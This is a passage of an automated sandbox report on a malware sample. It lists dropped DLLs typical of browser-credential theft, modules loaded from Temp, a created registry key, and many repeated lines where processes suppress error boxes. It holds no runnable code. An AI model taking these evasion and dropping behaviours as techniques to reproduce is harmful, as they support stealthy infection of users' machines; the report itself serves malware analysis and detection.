                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ssfwvkJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile created: C:\Users\user\AppData\Local\Temp\u5qk.2\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\nkhoJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ssfwvkJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\nkhoJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo ApplicationsJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\SSFWVK
                              Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NKHO
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
